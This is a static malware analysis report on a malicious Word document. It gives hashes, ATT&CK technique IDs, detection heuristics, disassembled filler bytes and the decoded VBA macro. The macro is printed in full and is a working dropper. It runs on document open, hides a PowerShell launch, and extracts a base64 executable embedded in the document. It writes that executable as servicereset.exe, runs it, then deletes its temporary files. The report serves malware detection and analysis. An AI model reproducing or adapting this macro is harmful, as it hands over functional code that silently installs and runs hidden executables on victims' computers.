Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 119c64a8b35bd626…

MALICIOUS

Office (OLE)

840.5 KB Created: 2017-08-21 21:16:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 02306d629ca4092551081c4ebcbbd9b4 SHA-1: cc40a3bb20b17bb13e8b5888634ea9371d69ec01 SHA-256: 119c64a8b35bd626b3ea5f630d533b2e0e7852a4c59694125ff08f9965b5f9cc
498 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a critical OLE_VBA_SHELL and OLE_VBA_PS heuristic, indicating the VBA macro attempts to execute PowerShell commands. The Document_Open macro constructs a path to 'AppData\Pr.bin' and uses 'Shell' to write 'powershell' to it, followed by a delay. It then reads this file and executes it using the PowerShell command. The macro also attempts to copy the current document to 'AppData\Tmp.doc' and process it further, suggesting a downloader or dropper functionality.

Heuristics 14

  • ClamAV: Doc.Dropper.Agent-6343826-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6343826-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    OoHHHD = Environ$("AppData") & "\Pr.bin"
Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    OoHHHD = Environ$("AppData") & "\Pr.bin"
Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    OoHHHD = Environ$("AppData") & "\Pr.bin"
Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim hBLtBWN, eBUH
Set hBLtBWN = CreateObject("ADODB.Stream")
hBLtBWN.Charset = "utf-8"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Option Explicit
Private Sub Document_Open()
Dim OoHHHD As String
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim OoHHHD As String
OoHHHD = Environ$("AppData") & "\Pr.bin"
Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
    000D16E9  41                inc ecx
000D16EA  41                inc ecx
000D16EB  41                inc ecx
000D16EC  41                inc ecx
000D16ED  41                inc ecx
000D16EE  41                inc ecx
000D16EF  41                inc ecx
000D16F0  41                inc ecx
000D16F1  41                inc ecx
000D16F2  41                inc ecx
000D16F3  41                inc ecx
000D16F4  41                inc ecx
000D16F5  41                inc ecx
000D16F6  41                inc ecx
000D16F7  41                inc ecx
000D16F8  41                inc ecx
000D16F9  41                inc ecx
000D16FA  41                inc ecx
000D16FB  41                inc ecx
000D16FC  41                inc ecx
000D16FD  41                inc ecx
000D16FE  41                inc ecx
000D16FF  41                inc ecx
000D1700  41                inc ecx
000D1701  41                inc ecx
000D1702  41                inc ecx
000D1703  41                inc ecx
000D1704  41                inc ecx
000D1705  41                inc ecx
000D1706  41                inc ecx
000D1707  41                inc ecx
000D1708  41                inc ecx
000D1709  41                inc ecx
000D170A  41                inc ecx
000D170B  41                inc ecx
000D170C  41                inc ecx
000D170D  41                inc ecx
000D170E  41                inc ecx
000D170F  41                inc ecx
000D1710  41                inc ecx
000D1711  41                inc ecx
000D1712  41                inc ecx
000D1713  41                inc ecx
000D1714  41                inc ecx
000D1715  41                inc ecx
000D1716  41                inc ecx
000D1717  41                inc ecx
000D1718  41                inc ecx
000D1719  41                inc ecx
000D171A  41                inc ecx
000D171B  41                inc ecx
000D171C  41                inc ecx
000D171D  41                inc ecx
000D171E  41                inc ecx
000D171F  41                inc ecx
000D1720  41                inc ecx
000D1721  41                inc ecx
000D1722  41                inc ecx
000D1723  41                inc ecx
000D1724  41                inc ecx
000D1725  41                inc ecx
000D1726  41                inc ecx
000D1727  41                inc ecx
000D1728  41                inc ecx
000D1729  41                inc ecx
000D172A  41                inc ecx
000D172B  41                inc ecx
000D172C  41                inc ecx
000D172D  41                inc ecx
000D172E  41                inc ecx
000D172F  41                inc ecx
000D1730  41                inc ecx
000D1731  41                inc ecx
000D1732  41                inc ecx
000D1733  41                inc ecx
000D1734  41                inc ecx
000D1735  41                inc ecx
000D1736  41                inc ecx
000D1737  41                inc ecx
000D1738  41                inc ecx
000D1739  41                inc ecx
000D173A  41                inc ecx
000D173B  41                inc ecx
000D173C  41                inc ecx
000D173D  41                inc ecx
000D173E  41                inc ecx
000D173F  41                inc ecx
000D1740  41                inc ecx
000D1741  41                inc ecx
000D1742  41                inc ecx
000D1743  41                inc ecx
000D1744  41                inc ecx
000D1745  41                inc ecx
000D1746  41                inc ecx
000D1747  41                inc ecx
000D1748  41                inc ecx
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00088227  41                inc ecx
00088228  41                inc ecx
00088229  41                inc ecx
0008822A  41                inc ecx
0008822B  41                inc ecx
0008822C  41                inc ecx
0008822D  41                inc ecx
0008822E  41                inc ecx
0008822F  41                inc ecx
00088230  41                inc ecx
00088231  41                inc ecx
00088232  41                inc ecx
00088233  41                inc ecx
00088234  41                inc ecx
00088235  41                inc ecx
00088236  41                inc ecx
00088237  41                inc ecx
00088238  41                inc ecx
00088239  41                inc ecx
0008823A  41                inc ecx
0008823B  41                inc ecx
0008823C  41                inc ecx
0008823D  41                inc ecx
0008823E  41                inc ecx
0008823F  41                inc ecx
00088240  41                inc ecx
00088241  41                inc ecx
00088242  41                inc ecx
00088243  41                inc ecx
00088244  41                inc ecx
00088245  41                inc ecx
00088246  41                inc ecx
00088247  41                inc ecx
00088248  41                inc ecx
00088249  41                inc ecx
0008824A  41                inc ecx
0008824B  41                inc ecx
0008824C  41                inc ecx
0008824D  41                inc ecx
0008824E  41                inc ecx
0008824F  41                inc ecx
00088250  41                inc ecx
00088251  41                inc ecx
00088252  41                inc ecx
00088253  41                inc ecx
00088254  41                inc ecx
00088255  41                inc ecx
00088256  6741              inc ecx
00088258  41                inc ecx
00088259  41                inc ecx
0008825A  41                inc ecx
0008825B  41                inc ecx
0008825C  3466              xor al, 0x66
0008825E  7567              jne 0x882c7
00088260  3441              xor al, 0x41
00088262  7441              je 0x882a5
00088264  6e                outsb dx, byte ptr [esi]
00088265  4e                dec esi
00088266  49                dec ecx
00088267  626742            bound esp, qword ptr [edi + 0x42]
0008826A  54                push esp
0008826B  4d                dec ebp
0008826C  306856            xor byte ptr [eax + 0x56], ch
0008826F  47                inc edi
00088270  6870637942        push 0x42796370
00088275  7763              ja 0x882da
00088277  6d                insd dword ptr es:[edi], dx
00088278  396e63            cmp dword ptr [esi + 0x63], ebp
0008827B  6d                insd dword ptr es:[edi], dx
0008827C  46                inc esi
0008827D  7449              je 0x882c8
0008827F  47                inc edi
00088280  4e                dec esi
00088281  68626d3576        push 0x76356d62
00088286  64                .byte 0x64
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2839 bytes
SHA-256: 1dd296c7d968d776126e27e2ba61cfa7380caa14fe3388f3ead2ae6c936acfd3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub Document_Open()
Dim OoHHHD As String
OoHHHD = Environ$("AppData") & "\Pr.bin"
Shell Environ$("COMSPEC") & " /c echo powershell > " & " " & Chr(34) & OoHHHD & Chr(34), vbHide

Dim JnQTSPz
JnQTSPz = DateAdd("s", 2, Now())
Do Until (Now() > JnQTSPz)
Loop

Dim hBLtBWN, eBUH
Set hBLtBWN = CreateObject("ADODB.Stream")
hBLtBWN.Charset = "utf-8"
hBLtBWN.Open
hBLtBWN.LoadFromFile (OoHHHD)
eBUH = hBLtBWN.ReadText()
eBUH = Replace(eBUH, vbCrLf, vbNullString)


Dim COOgvrT As String
COOgvrT = ThisDocument.FullName
Dim ANYuGEOsm As String
ANYuGEOsm = Environ$("AppData") & "\Tmp.doc"
Dim xMjIQQ As String
xMjIQQ = "Copy-Item " & Chr(39) & "%FilePath%" & Chr(39) & " " & Chr(39) & "%DestFolder%" & Chr(39)
xMjIQQ = Replace(xMjIQQ, "%FilePath%", COOgvrT)
xMjIQQ = Replace(xMjIQQ, "%DestFolder%", ANYuGEOsm)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & xMjIQQ, vbHide


Dim JnQTSPzC
JnQTSPzC = DateAdd("s", 7, Now())
Do Until (Now() > JnQTSPzC)
Loop

Dim UbdhzXR, RbnuKl
Set UbdhzXR = CreateObject("ADODB.Stream")
UbdhzXR.Charset = "utf-8"
UbdhzXR.Open
UbdhzXR.LoadFromFile (ANYuGEOsm)
RbnuKl = UbdhzXR.ReadText()

Dim OaxIUyC As String
Dim norhEFQN() As String
norhEFQN = Split(RbnuKl, Chr(35) & Chr(35) & Chr(35) & Chr(36) & Chr(36) & Chr(36))
Dim MyBase As String
MyBase = norhEFQN(1)

Dim lnBvO As String
lnBvO = Environ$("AppData") & "\Base.txt"

Dim JBvTxY
Dim f
Set JBvTxY = CreateObject("Scripting.FileSystemObject")
Set f = JBvTxY.OpenTextFile(lnBvO, 2, True)
f.write MyBase
f.Close

Dim GBFiI As String
GBFiI = Environ$("PUBLIC") & "\Libraries\servicereset.exe"
Dim DAOvSAGaX As String
DAOvSAGaX = "$DATA = [System.Convert]::FromBase64String([IO.File]::ReadAllText('%Base%'));[io.file]::WriteAllBytes('GBFiI',$DATA);Start-Process 'GBFiI'"
DAOvSAGaX = Replace(DAOvSAGaX, "%Base%", lnBvO)
DAOvSAGaX = Replace(DAOvSAGaX, "GBFiI", GBFiI)

Shell Environ$("COMSPEC") & " /c " & eBUH & " " & DAOvSAGaX, vbHide

Dim bNJTCGU As String
bNJTCGU = "Remove-Item " & Chr(39) & "%File%" & Chr(39)
bNJTCGU = Replace(bNJTCGU, "%File%", ANYuGEOsm)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & bNJTCGU, vbHide

bNJTCGU = "Remove-Item " & Chr(39) & "%File%" & Chr(39)
bNJTCGU = Replace(bNJTCGU, "%File%", lnBvO)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & bNJTCGU, vbHide

bNJTCGU = "Remove-Item " & Chr(39) & "%File%" & Chr(39)
bNJTCGU = Replace(bNJTCGU, "%File%", OoHHHD)
Shell Environ$("COMSPEC") & " /c " & eBUH & " " & bNJTCGU, vbHide
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.